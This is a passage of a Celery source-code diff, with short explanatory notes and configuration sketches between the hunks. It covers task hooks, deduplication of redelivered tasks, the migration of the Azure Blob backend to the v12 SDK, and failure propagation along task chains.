+ args (Tuple): Original arguments for the task to execute.
+ kwargs (Dict): Original keyword arguments for the task to execute.
+
+ Returns:
+ None: The return value of this handler is ignored.
+ """
def on_success(self, retval, task_id, args, kwargs):
"""Success handler.
@@ -1038,7 +1092,7 @@ def backend(self):
return backend
@backend.setter
- def backend(self, value): # noqa
+ def backend(self, value):
self._backend = value
@property
@@ -1046,4 +1100,4 @@ def __name__(self):
return self.__class__.__name__
-BaseTask = Task # noqa: E305 XXX compat alias
+BaseTask = Task # XXX compat alias
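For orientation, the task-level changes above (the new ``before_start`` hook and the ``override_max_retries`` bookkeeping in ``retry()``) can be exercised from user code. A minimal sketch, assuming an illustrative app, task class and task names that are not part of this diff:

    from celery import Celery, Task

    app = Celery('example', broker='memory://', backend='cache+memory://')

    class AuditedTask(Task):
        def before_start(self, task_id, args, kwargs):
            # Called in the worker just before the task body runs; the
            # return value is ignored (see the handler docstring above).
            print(f'starting {self.name}[{task_id}] args={args!r} kwargs={kwargs!r}')

    @app.task(base=AuditedTask, bind=True, max_retries=3)
    def flaky(self, x):
        if x < 0:
            # Passing max_retries here overrides Task.max_retries for this
            # request only, via the override_max_retries attribute added above.
            raise self.retry(max_retries=5, countdown=1)
        return x * 2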
diff --git a/celery/app/trace.py b/celery/app/trace.py
index bb928f2f20b..7b5b00b8c95 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -20,7 +20,9 @@
from celery._state import _task_stack
from celery.app.task import Context
from celery.app.task import Task as BaseTask
-from celery.exceptions import Ignore, InvalidTaskError, Reject, Retry
+from celery.exceptions import (BackendGetMetaError, Ignore, InvalidTaskError,
+ Reject, Retry)
+from celery.result import AsyncResult
from celery.utils.log import get_logger
from celery.utils.nodenames import gethostname
from celery.utils.objects import mro_lookup
@@ -46,8 +48,15 @@
'setup_worker_optimizations', 'reset_worker_optimizations',
)
+from celery.worker.state import successful_requests
+
logger = get_logger(__name__)
+#: Format string used to log task receipt.
+LOG_RECEIVED = """\
+Task %(name)s[%(id)s] received\
+"""
+
#: Format string used to log task success.
LOG_SUCCESS = """\
Task %(name)s[%(id)s] succeeded in %(runtime)ss: %(return_value)s\
@@ -159,9 +168,13 @@ def __init__(self, state, retval=None):
def handle_error_state(self, task, req,
eager=False, call_errbacks=True):
- store_errors = not eager
if task.ignore_result:
store_errors = task.store_errors_even_if_ignored
+ elif eager and task.store_eager_result:
+ store_errors = True
+ else:
+ store_errors = not eager
+
return {
RETRY: self.handle_retry,
FAILURE: self.handle_failure,
@@ -266,18 +279,14 @@ def traceback_clear(exc=None):
else:
_, _, tb = sys.exc_info()
- if sys.version_info >= (3, 5, 0):
- while tb is not None:
- try:
- tb.tb_frame.clear()
- tb.tb_frame.f_locals
- except RuntimeError:
- # Ignore the exception raised if the frame is still executing.
- pass
- tb = tb.tb_next
-
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear()
+ while tb is not None:
+ try:
+ tb.tb_frame.clear()
+ tb.tb_frame.f_locals
+ except RuntimeError:
+ # Ignore the exception raised if the frame is still executing.
+ pass
+ tb = tb.tb_next
def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
@@ -307,7 +316,7 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
:keyword request: Request dict.
"""
- # noqa: C901
+
# pylint: disable=too-many-statements
# If the task doesn't define a custom __call__ method
@@ -316,28 +325,36 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
fun = task if task_has_custom(task, '__call__') else task.run
loader = loader or app.loader
- backend = task.backend
ignore_result = task.ignore_result
track_started = task.track_started
track_started = not eager and (task.track_started and not ignore_result)
- publish_result = not eager and not ignore_result
+
+ # #6476
+ if eager and not ignore_result and task.store_eager_result:
+ publish_result = True
+ else:
+ publish_result = not eager and not ignore_result
+
+ deduplicate_successful_tasks = ((app.conf.task_acks_late or task.acks_late)
+ and app.conf.worker_deduplicate_successful_tasks
+ and app.backend.persistent)
+
hostname = hostname or gethostname()
inherit_parent_priority = app.conf.task_inherit_parent_priority
loader_task_init = loader.on_task_init
loader_cleanup = loader.on_process_cleanup
+ task_before_start = None
task_on_success = None
task_after_return = None
+ if task_has_custom(task, 'before_start'):
+ task_before_start = task.before_start
if task_has_custom(task, 'on_success'):
task_on_success = task.on_success
if task_has_custom(task, 'after_return'):
task_after_return = task.after_return
- store_result = backend.store_result
- mark_as_done = backend.mark_as_done
- backend_cleanup = backend.process_cleanup
-
pid = os.getpid()
request_stack = task.request_stack
@@ -385,9 +402,31 @@ def trace_task(uuid, args, kwargs, request=None):
except AttributeError:
raise InvalidTaskError(
'Task keyword arguments is not a mapping')
- push_task(task)
+
task_request = Context(request or {}, args=args,
called_directly=False, kwargs=kwargs)
+
+ redelivered = (task_request.delivery_info
+ and task_request.delivery_info.get('redelivered', False))
+ if deduplicate_successful_tasks and redelivered:
+ if task_request.id in successful_requests:
+ return trace_ok_t(R, I, T, Rstr)
+ r = AsyncResult(task_request.id, app=app)
+
+ try:
+ state = r.state
+ except BackendGetMetaError:
+ pass
+ else:
+ if state == SUCCESS:
+ info(LOG_IGNORED, {
+ 'id': task_request.id,
+ 'name': get_task_name(task_request, name),
+ 'description': 'Task already completed successfully.'
+ })
+ return trace_ok_t(R, I, T, Rstr)
+
+ push_task(task)
root_id = task_request.root_id or uuid
task_priority = task_request.delivery_info.get('priority') if \
inherit_parent_priority else None
@@ -399,13 +438,16 @@ def trace_task(uuid, args, kwargs, request=None):
args=args, kwargs=kwargs)
loader_task_init(uuid, task)
if track_started:
- store_result(
+ task.backend.store_result(
uuid, {'pid': pid, 'hostname': hostname}, STARTED,
request=task_request,
)
# -*- TRACE -*-
try:
+ if task_before_start:
+ task_before_start(uuid, args, kwargs)
+
R = retval = fun(*args, **kwargs)
state = SUCCESS
except Reject as exc:
@@ -473,7 +515,7 @@ def trace_task(uuid, args, kwargs, request=None):
parent_id=uuid, root_id=root_id,
priority=task_priority
)
- mark_as_done(
+ task.backend.mark_as_done(
uuid, retval, task_request, publish_result,
)
except EncodeError as exc:
@@ -491,6 +533,8 @@ def trace_task(uuid, args, kwargs, request=None):
'name': get_task_name(task_request, name),
'return_value': Rstr,
'runtime': T,
+ 'args': safe_repr(args),
+ 'kwargs': safe_repr(kwargs),
})
# -* POST *-
@@ -510,7 +554,7 @@ def trace_task(uuid, args, kwargs, request=None):
pop_request()
if not eager:
try:
- backend_cleanup()
+ task.backend.process_cleanup()
loader_cleanup()
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
@@ -564,9 +608,9 @@ def _signal_internal_error(task, uuid, args, kwargs, request, exc):
del tb
-def _trace_task_ret(name, uuid, request, body, content_type,
- content_encoding, loads=loads_message, app=None,
- **extra_request):
+def trace_task_ret(name, uuid, request, body, content_type,
+ content_encoding, loads=loads_message, app=None,
+ **extra_request):
app = app or current_app._get_current_object()
embed = None
if content_type:
@@ -586,12 +630,9 @@ def _trace_task_ret(name, uuid, request, body, content_type,
return (1, R, T) if I else (0, Rstr, T)
-trace_task_ret = _trace_task_ret # noqa: E305
-
-
-def _fast_trace_task(task, uuid, request, body, content_type,
- content_encoding, loads=loads_message, _loc=None,
- hostname=None, **_):
+def fast_trace_task(task, uuid, request, body, content_type,
+ content_encoding, loads=loads_message, _loc=None,
+ hostname=None, **_):
_loc = _localized if not _loc else _loc
embed = None
tasks, accept, hostname = _loc
@@ -626,8 +667,6 @@ def report_internal_error(task, exc):
def setup_worker_optimizations(app, hostname=None):
"""Setup worker related optimizations."""
- global trace_task_ret
-
hostname = hostname or gethostname()
# make sure custom Task.__call__ methods that calls super
@@ -653,16 +692,11 @@ def setup_worker_optimizations(app, hostname=None):
hostname,
]
- trace_task_ret = _fast_trace_task
- from celery.worker import request as request_module
- request_module.trace_task_ret = _fast_trace_task
- request_module.__optimize__()
+ app.use_fast_trace_task = True
-def reset_worker_optimizations():
+def reset_worker_optimizations(app=current_app):
"""Reset previously configured optimizations."""
- global trace_task_ret
- trace_task_ret = _trace_task_ret
try:
delattr(BaseTask, '_stackprotected')
except AttributeError:
@@ -671,8 +705,7 @@ def reset_worker_optimizations():
BaseTask.__call__ = _patched.pop('BaseTask.__call__')
except KeyError:
pass
- from celery.worker import request as request_module
- request_module.trace_task_ret = _trace_task_ret
+ app.use_fast_trace_task = False
def _install_stack_protection():
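The tracer changes above are driven by configuration; a hedged sketch of the settings involved (the broker/backend URLs are placeholders, and the deduplication branch additionally requires a persistent result backend):

    from celery import Celery

    app = Celery('example',
                 broker='amqp://localhost//',
                 backend='redis://localhost/0')

    # All three conditions checked in build_tracer() must hold for
    # redelivered-task deduplication: late acks, the new worker setting,
    # and a persistent backend.
    app.conf.task_acks_late = True
    app.conf.worker_deduplicate_successful_tasks = True

    # Eager runs can now publish results too (#6476); this assumes the
    # task_store_eager_result setting that backs Task.store_eager_result.
    app.conf.task_always_eager = True
    app.conf.task_store_eager_result = True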
diff --git a/celery/app/utils.py b/celery/app/utils.py
index 05aeb1e5016..8b72652e708 100644
--- a/celery/app/utils.py
+++ b/celery/app/utils.py
@@ -394,7 +394,8 @@ def find_app(app, symbol_by_name=symbol_by_name, imp=import_from_cwd):
try:
found = sym.celery
if isinstance(found, ModuleType):
- raise AttributeError("attribute 'celery' is the celery module not the instance of celery")
+ raise AttributeError(
+ "attribute 'celery' is the celery module not the instance of celery")
except AttributeError:
if getattr(sym, '__path__', None):
try:
diff --git a/celery/apps/beat.py b/celery/apps/beat.py
index 41437718e9c..8652c62730a 100644
--- a/celery/apps/beat.py
+++ b/celery/apps/beat.py
@@ -111,7 +111,7 @@ def start_scheduler(self):
def banner(self, service):
c = self.colored
- return str( # flake8: noqa
+ return str(
c.blue('__ ', c.magenta('-'),
c.blue(' ... __ '), c.magenta('-'),
c.blue(' _\n'),
diff --git a/celery/apps/multi.py b/celery/apps/multi.py
index b82eee4c9b3..613743426e5 100644
--- a/celery/apps/multi.py
+++ b/celery/apps/multi.py
@@ -78,7 +78,7 @@ def __init__(self, args):
self.namespaces = defaultdict(lambda: OrderedDict())
def parse(self):
- rargs = list(self.args)
+ rargs = [arg for arg in self.args if arg]
pos = 0
while pos < len(rargs):
arg = rargs[pos]
@@ -150,7 +150,7 @@ def _setdefaultopt(self, d, alt, value):
pass
value = d.setdefault(alt[0], os.path.normpath(value))
dir_path = os.path.dirname(value)
- if not os.path.exists(dir_path):
+ if dir_path and not os.path.exists(dir_path):
os.makedirs(dir_path)
return value
@@ -160,10 +160,30 @@ def _prepare_expander(self):
self.name, shortname, hostname)
def _prepare_argv(self):
+ cmd = self.expander(self.cmd).split(' ')
+ i = cmd.index('celery') + 1
+
+ options = self.options.copy()
+ for opt, value in self.options.items():
+ if opt in (
+ '-A', '--app',
+ '-b', '--broker',
+ '--result-backend',
+ '--loader',
+ '--config',
+ '--workdir',
+ '-C', '--no-color',
+ '-q', '--quiet',
+ ):
+ cmd.insert(i, format_opt(opt, self.expander(value)))
+
+ options.pop(opt)
+
+ cmd = [' '.join(cmd)]
argv = tuple(
- [self.expander(self.cmd)] +
+ cmd +
[format_opt(opt, self.expander(value))
- for opt, value in self.options.items()] +
+ for opt, value in options.items()] +
[self.extra_args]
)
if self.append:
@@ -222,7 +242,7 @@ def getopt(self, *alt):
raise KeyError(alt[0])
def __repr__(self):
- return '<{name}: {0.name}>'.format(self, name=type(self).__name__)
+ return f'<{type(self).__name__}: {self.name}>'
@cached_property
def pidfile(self):
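The option shuffling in ``_prepare_argv`` above exists because the Celery 5 CLI only accepts options such as ``-A``/``--workdir`` before the subcommand. A standalone sketch of the same idea in plain Python (not the multi API itself; names are illustrative):

    # Options that must precede the subcommand, as listed in the diff above.
    EARLY_OPTS = {'-A', '--app', '-b', '--broker', '--result-backend',
                  '--loader', '--config', '--workdir', '-C', '--no-color',
                  '-q', '--quiet'}

    def reorder(cmd, options):
        """Move "early" options directly after the 'celery' executable."""
        argv = list(cmd)
        i = argv.index('celery') + 1
        tail = []
        for opt, value in options.items():
            if opt in EARLY_OPTS:
                argv.insert(i, f'{opt} {value}')
            else:
                tail.append(f'{opt} {value}')
        return argv + tail

    print(reorder(['celery', 'worker'], {'-A': 'proj', '-l': 'INFO'}))
    # ['celery', '-A proj', 'worker', '-l INFO']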
diff --git a/celery/apps/worker.py b/celery/apps/worker.py
index 6c1b5eb1c20..8f774ae3858 100644
--- a/celery/apps/worker.py
+++ b/celery/apps/worker.py
@@ -79,7 +79,7 @@ def active_thread_count():
def safe_say(msg):
- print(f'\n{msg}', file=sys.__stderr__)
+ print(f'\n{msg}', file=sys.__stderr__, flush=True)
class Worker(WorkController):
@@ -121,7 +121,7 @@ def on_init_blueprint(self):
def on_start(self):
app = self.app
- WorkController.on_start(self)
+ super().on_start()
# this signal can be used to, for example, change queues after
# the -Q option has been applied.
@@ -141,12 +141,23 @@ def on_start(self):
app.log.redirect_stdouts(self.redirect_stdouts_level)
# TODO: Remove the following code in Celery 6.0
- if app.conf.maybe_warn_deprecated_settings():
- logger.warning(
- "Please run `celery upgrade settings path/to/settings.py` "
- "to avoid these warnings and to allow a smoother upgrade "
- "to Celery 6.0."
- )
+ # This qualifies as a hack for issue #6366.
+ warn_deprecated = True
+ config_source = app._config_source
+ if isinstance(config_source, str):
+ # Don't raise the warning when the settings originate from
+ # django.conf:settings
+ warn_deprecated = config_source.lower() not in [
+ 'django.conf:settings',
+ ]
+
+ if warn_deprecated:
+ if app.conf.maybe_warn_deprecated_settings():
+ logger.warning(
+ "Please run `celery upgrade settings path/to/settings.py` "
+ "to avoid these warnings and to allow a smoother upgrade "
+ "to Celery 6.0."
+ )
def emit_banner(self):
# Dump configuration to screen so we have some basic information
@@ -158,7 +169,7 @@ def emit_banner(self):
str(self.colored.cyan(
' \n', self.startup_info(artlines=not use_image))),
str(self.colored.reset(self.extra_info() or '')),
- ])), file=sys.__stdout__)
+ ])), file=sys.__stdout__, flush=True)
def on_consumer_ready(self, consumer):
signals.worker_ready.send(sender=consumer)
@@ -176,7 +187,7 @@ def purge_messages(self):
with self.app.connection_for_write() as connection:
count = self.app.control.purge(connection=connection)
if count: # pragma: no cover
- print(f"purge: Erased {count} {pluralize(count, 'message')} from the queue.\n")
+ print(f"purge: Erased {count} {pluralize(count, 'message')} from the queue.\n", flush=True)
def tasklist(self, include_builtins=True, sep='\n', int_='celery.'):
return sep.join(
diff --git a/celery/backends/arangodb.py b/celery/backends/arangodb.py
index 8297398a6c2..a7575741575 100644
--- a/celery/backends/arangodb.py
+++ b/celery/backends/arangodb.py
@@ -17,7 +17,7 @@
from pyArango import connection as py_arango_connection
from pyArango.theExceptions import AQLQueryError
except ImportError:
- py_arango_connection = AQLQueryError = None # noqa
+ py_arango_connection = AQLQueryError = None
__all__ = ('ArangoDbBackend',)
@@ -48,6 +48,7 @@ class ArangoDbBackend(KeyValueStoreBackend):
password = None
# protocol is not supported in backend url (http is taken as default)
http_protocol = 'http'
+ verify = False
# Use str as arangodb key not bytes
key_t = str
@@ -88,6 +89,7 @@ def __init__(self, url=None, *args, **kwargs):
self.host = host or config.get('host', self.host)
self.port = int(port or config.get('port', self.port))
self.http_protocol = config.get('http_protocol', self.http_protocol)
+ self.verify = config.get('verify', self.verify)
self.database = database or config.get('database', self.database)
self.collection = \
collection or config.get('collection', self.collection)
@@ -104,7 +106,7 @@ def connection(self):
if self._connection is None:
self._connection = py_arango_connection.Connection(
arangoURL=self.arangodb_url, username=self.username,
- password=self.password
+ password=self.password, verify=self.verify
)
return self._connection
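A hedged configuration sketch for the new ``verify`` option (host, database and collection names are placeholders and the URL shape is illustrative):

    from celery import Celery

    app = Celery('example', broker='memory://')
    app.conf.result_backend = 'arangodb://localhost:8529/celery/task_results'
    # The new key read from arangodb_backend_settings above; it is passed
    # through to pyArango's Connection(..., verify=...).
    app.conf.arangodb_backend_settings = {
        'http_protocol': 'https',
        'verify': True,
    }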
diff --git a/celery/backends/asynchronous.py b/celery/backends/asynchronous.py
index 32475d5eaa6..cedae5013a8 100644
--- a/celery/backends/asynchronous.py
+++ b/celery/backends/asynchronous.py
@@ -66,18 +66,30 @@ def wait_for(self, p, wait, timeout=None):
class greenletDrainer(Drainer):
spawn = None
_g = None
+    _drain_complete_event = None  # event, sent (and recreated) after every drain_events iteration
+
+ def _create_drain_complete_event(self):
+ """create new self._drain_complete_event object"""
+ pass
+
+ def _send_drain_complete_event(self):
+ """raise self._drain_complete_event for wakeup .wait_for"""
+ pass
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._started = threading.Event()
self._stopped = threading.Event()
self._shutdown = threading.Event()
+ self._create_drain_complete_event()
def run(self):
self._started.set()
while not self._stopped.is_set():
try:
self.result_consumer.drain_events(timeout=1)
+ self._send_drain_complete_event()
+ self._create_drain_complete_event()
except socket.timeout:
pass
self._shutdown.set()
@@ -89,8 +101,14 @@ def start(self):
def stop(self):
self._stopped.set()
+ self._send_drain_complete_event()
self._shutdown.wait(THREAD_TIMEOUT_MAX)
+ def wait_for(self, p, wait, timeout=None):
+ self.start()
+ if not p.ready:
+ self._drain_complete_event.wait(timeout=timeout)
+
@register_drainer('eventlet')
class eventletDrainer(greenletDrainer):
@@ -101,10 +119,12 @@ def spawn(self, func):
sleep(0)
return g
- def wait_for(self, p, wait, timeout=None):
- self.start()
- if not p.ready:
- self._g._exit_event.wait(timeout=timeout)
+ def _create_drain_complete_event(self):
+ from eventlet.event import Event
+ self._drain_complete_event = Event()
+
+ def _send_drain_complete_event(self):
+ self._drain_complete_event.send()
@register_drainer('gevent')
@@ -116,11 +136,13 @@ def spawn(self, func):
gevent.sleep(0)
return g
- def wait_for(self, p, wait, timeout=None):
- import gevent
- self.start()
- if not p.ready:
- gevent.wait([self._g], timeout=timeout)
+ def _create_drain_complete_event(self):
+ from gevent.event import Event
+ self._drain_complete_event = Event()
+
+ def _send_drain_complete_event(self):
+ self._drain_complete_event.set()
+ self._create_drain_complete_event()
class AsyncBackendMixin:
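The drain-complete event pattern introduced above can be illustrated with a plain ``threading.Event`` (the concrete drainers in the diff use eventlet/gevent events instead; the class and method names here are illustrative):

    import threading

    class DrainCompleteNotifier:
        """Sketch: recreate the event after each drain cycle so every
        waiter observes at most one completed iteration."""

        def __init__(self):
            self._event = threading.Event()

        def drain_once(self):
            ...  # placeholder for result_consumer.drain_events(timeout=1)
            event, self._event = self._event, threading.Event()
            event.set()  # wake anyone blocked in wait_for()

        def wait_for(self, timeout=None):
            self._event.wait(timeout=timeout)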
diff --git a/celery/backends/azureblockblob.py b/celery/backends/azureblockblob.py
index f287200dcc7..e7d2c231808 100644
--- a/celery/backends/azureblockblob.py
+++ b/celery/backends/azureblockblob.py
@@ -8,17 +8,17 @@
from .base import KeyValueStoreBackend
try:
- from azure import storage as azurestorage
- from azure.common import AzureMissingResourceHttpError
- from azure.storage.blob import BlockBlobService
- from azure.storage.common.retry import ExponentialRetry
-except ImportError: # pragma: no cover
- azurestorage = BlockBlobService = ExponentialRetry = \
- AzureMissingResourceHttpError = None # noqa
+ import azure.storage.blob as azurestorage
+ from azure.core.exceptions import (ResourceExistsError,
+ ResourceNotFoundError)
+ from azure.storage.blob import BlobServiceClient
+except ImportError:
+ azurestorage = None
__all__ = ("AzureBlockBlobBackend",)
LOGGER = get_logger(__name__)
+AZURE_BLOCK_BLOB_CONNECTION_PREFIX = 'azureblockblob://'
class AzureBlockBlobBackend(KeyValueStoreBackend):
@@ -27,17 +27,14 @@ class AzureBlockBlobBackend(KeyValueStoreBackend):
def __init__(self,
url=None,
container_name=None,
- retry_initial_backoff_sec=None,
- retry_increment_base=None,
- retry_max_attempts=None,
*args,
**kwargs):
super().__init__(*args, **kwargs)
- if azurestorage is None:
+ if azurestorage is None or azurestorage.__version__ < '12':
raise ImproperlyConfigured(
- "You need to install the azure-storage library to use the "
- "AzureBlockBlob backend")
+ "You need to install the azure-storage-blob v12 library to"
+ "use the AzureBlockBlob backend")
conf = self.app.conf
@@ -47,20 +44,14 @@ def __init__(self,
container_name or
conf["azureblockblob_container_name"])
- self._retry_initial_backoff_sec = (
- retry_initial_backoff_sec or
- conf["azureblockblob_retry_initial_backoff_sec"])
-
- self._retry_increment_base = (
- retry_increment_base or
- conf["azureblockblob_retry_increment_base"])
-
- self._retry_max_attempts = (
- retry_max_attempts or
- conf["azureblockblob_retry_max_attempts"])
+ self.base_path = conf.get('azureblockblob_base_path', '')
+ self._connection_timeout = conf.get(
+ 'azureblockblob_connection_timeout', 20
+ )
+ self._read_timeout = conf.get('azureblockblob_read_timeout', 120)
@classmethod
- def _parse_url(cls, url, prefix="azureblockblob://"):
+ def _parse_url(cls, url, prefix=AZURE_BLOCK_BLOB_CONNECTION_PREFIX):
connection_string = url[len(prefix):]
if not connection_string:
raise ImproperlyConfigured("Invalid URL")
@@ -68,26 +59,26 @@ def _parse_url(cls, url, prefix="azureblockblob://"):
return connection_string
@cached_property
- def _client(self):
- """Return the Azure Storage Block Blob service.
+ def _blob_service_client(self):
+ """Return the Azure Storage Blob service client.
If this is the first call to the property, the client is created and
the container is created if it doesn't yet exist.
"""
- client = BlockBlobService(connection_string=self._connection_string)
-
- created = client.create_container(
- container_name=self._container_name, fail_on_exist=False)
+ client = BlobServiceClient.from_connection_string(
+ self._connection_string,
+ connection_timeout=self._connection_timeout,
+ read_timeout=self._read_timeout
+ )
- if created:
- LOGGER.info("Created Azure Blob Storage container %s",
- self._container_name)
-
- client.retry = ExponentialRetry(
- initial_backoff=self._retry_initial_backoff_sec,
- increment_base=self._retry_increment_base,
- max_attempts=self._retry_max_attempts).retry
+ try:
+ client.create_container(name=self._container_name)
+ msg = f"Container created with name {self._container_name}."
+ except ResourceExistsError:
+ msg = f"Container with name {self._container_name} already." \
+ "exists. This will not be created."
+ LOGGER.info(msg)
return client
@@ -96,16 +87,18 @@ def get(self, key):
Args:
key: The key for which to read the value.
-
"""
key = bytes_to_str(key)
- LOGGER.debug("Getting Azure Block Blob %s/%s",
- self._container_name, key)
+ LOGGER.debug("Getting Azure Block Blob %s/%s", self._container_name, key)
+
+ blob_client = self._blob_service_client.get_blob_client(
+ container=self._container_name,
+ blob=f'{self.base_path}{key}',
+ )
try:
- return self._client.get_blob_to_text(
- self._container_name, key).content
- except AzureMissingResourceHttpError:
+ return blob_client.download_blob().readall().decode()
+ except ResourceNotFoundError:
return None
def set(self, key, value):
@@ -117,11 +110,14 @@ def set(self, key, value):
"""
key = bytes_to_str(key)
- LOGGER.debug("Creating Azure Block Blob at %s/%s",
- self._container_name, key)
+ LOGGER.debug(f"Creating azure blob at {self._container_name}/{key}")
- return self._client.create_blob_from_text(
- self._container_name, key, value)
+ blob_client = self._blob_service_client.get_blob_client(
+ container=self._container_name,
+ blob=f'{self.base_path}{key}',
+ )
+
+ blob_client.upload_blob(value, overwrite=True)
def mget(self, keys):
"""Read all the values for the provided keys.
@@ -140,7 +136,31 @@ def delete(self, key):
"""
key = bytes_to_str(key)
- LOGGER.debug("Deleting Azure Block Blob at %s/%s",
- self._container_name, key)
-
- self._client.delete_blob(self._container_name, key)
+ LOGGER.debug(f"Deleting azure blob at {self._container_name}/{key}")
+
+ blob_client = self._blob_service_client.get_blob_client(
+ container=self._container_name,
+ blob=f'{self.base_path}{key}',
+ )
+
+ blob_client.delete_blob()
+
+ def as_uri(self, include_password=False):
+ if include_password:
+ return (
+ f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}'
+ f'{self._connection_string}'
+ )
+
+ connection_string_parts = self._connection_string.split(';')
+ account_key_prefix = 'AccountKey='
+ redacted_connection_string_parts = [
+ f'{account_key_prefix}**' if part.startswith(account_key_prefix)
+ else part
+ for part in connection_string_parts
+ ]
+
+ return (
+ f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}'
+ f'{";".join(redacted_connection_string_parts)}'
+ )
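A hedged configuration sketch for the rewritten backend (the connection string, container name and base path are placeholders):

    from celery import Celery

    app = Celery('example', broker='memory://')
    # azure-storage-blob v12 is required, as enforced in __init__ above.
    app.conf.result_backend = (
        'azureblockblob://'
        'DefaultEndpointsProtocol=https;AccountName=acct;AccountKey=secret;'
        'EndpointSuffix=core.windows.net'
    )
    app.conf.azureblockblob_container_name = 'celery'
    # New settings read from the configuration in this diff:
    app.conf.azureblockblob_base_path = 'results/'
    app.conf.azureblockblob_connection_timeout = 20
    app.conf.azureblockblob_read_timeout = 120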
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 28e5b2a4d6b..094cbf86921 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -22,9 +22,11 @@
import celery.exceptions
from celery import current_app, group, maybe_signature, states
from celery._state import get_current_task
+from celery.app.task import Context
from celery.exceptions import (BackendGetMetaError, BackendStoreError,
ChordError, ImproperlyConfigured,
- NotRegistered, TaskRevokedError, TimeoutError)
+ NotRegistered, SecurityError, TaskRevokedError,
+ TimeoutError)
from celery.result import (GroupResult, ResultBase, ResultSet,
allow_join_result, result_from_tuple)
from celery.utils.collections import BufferMap
@@ -76,6 +78,12 @@ def ignore(self, *a, **kw):
__setitem__ = update = setdefault = ignore
+def _is_request_ignore_result(request):
+ if request is None:
+ return False
+ return request.ignore_result
+
+
class Backend:
READY_STATES = states.READY_STATES
UNREADY_STATES = states.UNREADY_STATES
@@ -122,7 +130,7 @@ def __init__(self, app,
# precedence: accept, conf.result_accept_content, conf.accept_content
self.accept = conf.result_accept_content if accept is None else accept
- self.accept = conf.accept_content if self.accept is None else self.accept # noqa: E501
+ self.accept = conf.accept_content if self.accept is None else self.accept
self.accept = prepare_accept_content(self.accept)
self.always_retry = conf.get('result_backend_always_retry', False)
@@ -150,7 +158,7 @@ def mark_as_started(self, task_id, **meta):
def mark_as_done(self, task_id, result,
request=None, store_result=True, state=states.SUCCESS):
"""Mark task as successfully executed."""
- if store_result:
+ if (store_result and not _is_request_ignore_result(request)):
self.store_result(task_id, result, state, request=request)
if request and request.chord:
self.on_chord_part_return(request, state, result)
@@ -164,8 +172,50 @@ def mark_as_failure(self, task_id, exc,
self.store_result(task_id, exc, state,
traceback=traceback, request=request)
if request:
+ # This task may be part of a chord
if request.chord:
self.on_chord_part_return(request, state, exc)
+ # It might also have chained tasks which need to be propagated to,
+ # this is most likely to be exclusive with being a direct part of a
+ # chord but we'll handle both cases separately.
+ #
+ # The `chain_data` try block here is a bit tortured since we might
+ # have non-iterable objects here in tests and it's easier this way.
+ try:
+ chain_data = iter(request.chain)
+ except (AttributeError, TypeError):
+ chain_data = tuple()
+ for chain_elem in chain_data:
+ # Reconstruct a `Context` object for the chained task which has
+                # enough information for backends to work with
+ chain_elem_ctx = Context(chain_elem)
+ chain_elem_ctx.update(chain_elem_ctx.options)
+ chain_elem_ctx.id = chain_elem_ctx.options.get('task_id')
+ chain_elem_ctx.group = chain_elem_ctx.options.get('group_id')
+ # If the state should be propagated, we'll do so for all
+ # elements of the chain. This is only truly important so
+ # that the last chain element which controls completion of
+ # the chain itself is marked as completed to avoid stalls.
+ #
+ # Some chained elements may be complex signatures and have no
+ # task ID of their own, so we skip them hoping that not
+ # descending through them is OK. If the last chain element is
+ # complex, we assume it must have been uplifted to a chord by
+ # the canvas code and therefore the condition below will ensure
+            # that we mark something as being complete to avoid stalling.
+ if (
+ store_result and state in states.PROPAGATE_STATES and
+ chain_elem_ctx.task_id is not None
+ ):
+ self.store_result(
+ chain_elem_ctx.task_id, exc, state,
+ traceback=traceback, request=chain_elem_ctx,
+ )
+ # If the chain element is a member of a chord, we also need
+ # to call `on_chord_part_return()` as well to avoid stalls.
+ if 'chord' in chain_elem_ctx.options:
+ self.on_chord_part_return(chain_elem_ctx, state, exc)
+ # And finally we'll fire any errbacks
if call_errbacks and request.errbacks:
self._call_task_errbacks(request, exc, traceback)
@@ -235,19 +285,24 @@ def mark_as_retry(self, task_id, exc, traceback=None,
traceback=traceback, request=request)
def chord_error_from_stack(self, callback, exc=None):
- # need below import for test for some crazy reason
- from celery import group # pylint: disable
app = self.app
try:
backend = app._tasks[callback.task].backend
except KeyError:
backend = self
+ # We have to make a fake request since either the callback failed or
+ # we're pretending it did since we don't have information about the
+ # chord part(s) which failed. This request is constructed as a best
+ # effort for new style errbacks and may be slightly misleading about
+ # what really went wrong, but at least we call them!
+ fake_request = Context({
+ "id": callback.options.get("task_id"),
+ "errbacks": callback.options.get("link_error", []),
+ "delivery_info": dict(),
+ **callback
+ })
try:
- group(
- [app.signature(errback)
- for errback in callback.options.get('link_error') or []],
- app=app,
- ).apply_async((callback.id,))
+ self._call_task_errbacks(fake_request, exc, None)
except Exception as eb_exc: # pylint: disable=broad-except
return backend.fail_from_current_stack(callback.id, exc=eb_exc)
else:
@@ -261,18 +316,14 @@ def fail_from_current_stack(self, task_id, exc=None):
self.mark_as_failure(task_id, exc, exception_info.traceback)
return exception_info
finally:
- if sys.version_info >= (3, 5, 0):
- while tb is not None:
- try:
- tb.tb_frame.clear()
- tb.tb_frame.f_locals
- except RuntimeError:
- # Ignore the exception raised if the frame is still executing.
- pass
- tb = tb.tb_next
-
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear()
+ while tb is not None:
+ try:
+ tb.tb_frame.clear()
+ tb.tb_frame.f_locals
+ except RuntimeError:
+ # Ignore the exception raised if the frame is still executing.
+ pass
+ tb = tb.tb_next
del tb
@@ -288,34 +339,73 @@ def prepare_exception(self, exc, serializer=None):
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
- if exc:
- if not isinstance(exc, BaseException):
- exc_module = exc.get('exc_module')
- if exc_module is None:
- cls = create_exception_cls(
- from_utf8(exc['exc_type']), __name__)
- else:
- exc_module = from_utf8(exc_module)
- exc_type = from_utf8(exc['exc_type'])
- try:
- # Load module and find exception class in that
- cls = sys.modules[exc_module]
